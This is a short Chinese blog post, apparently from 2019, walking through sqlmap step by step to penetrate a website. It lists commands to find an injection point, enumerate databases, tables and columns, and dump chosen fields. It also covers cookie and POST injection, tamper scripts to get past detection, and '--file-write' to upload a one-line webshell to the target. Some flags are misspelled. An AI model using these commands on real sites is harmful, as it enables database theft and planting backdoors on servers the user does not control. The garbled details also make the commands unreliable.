使用sqlmap对网站一步步渗透

常规注入步骤
第一步注入点
-u "url" 判断是否是注入点
有就判断用户的权限
第二步获取数据库 所有的
-u "url" --dbs
第三步 查看应用程序所有数据库 当前注入点所连接的数据库
-u "url" --current-db /-user 获取用户名 用户名一般 root/sa 都是最高权限
第四步 指定数据库列出所有表
-u "url" --table -D "数据库名"
第五步 读取指定表的字段名称
-u "url" --columns/count -T "表名" -D "数据库" 返回字段/数据量
第六步 读取指定库表内指定的字段数据
-u "url" --dump -C "字段1,字段2" -D "库" -T"表"--

1.get 请求注入
sqlmap.py -u "url?id=1"
2.post请求注入
sqlmap.py -u "url" --data "a=123"
3.cookie 注入
sqlmap.py -u "url" --cookie "a=123"

延迟注入 在页面无变化 没有返回错误
sqlmap.py -u "url?id=1" --delay 10 延迟注入 如果10后有结果怎么他存在延时注入

-m "目录批量检查"
可以结合bp 进行批量检查
sqlmpa.py -l bp日志存储位置 --batch -smart batch 自动选择yes smart 启发式快速判断 节约时间

sqlmap.py -u "url" --tamper ="脚本名" 用来绕过sql注入 检测
sqlmap.py -u "url" --file-write "本地文件 一句话木马" --file-dest "目标绝对路径存储位置"

 

posted @ 2019-03-24 10:27  紅人  阅读(1086)  评论(0编辑  收藏  举报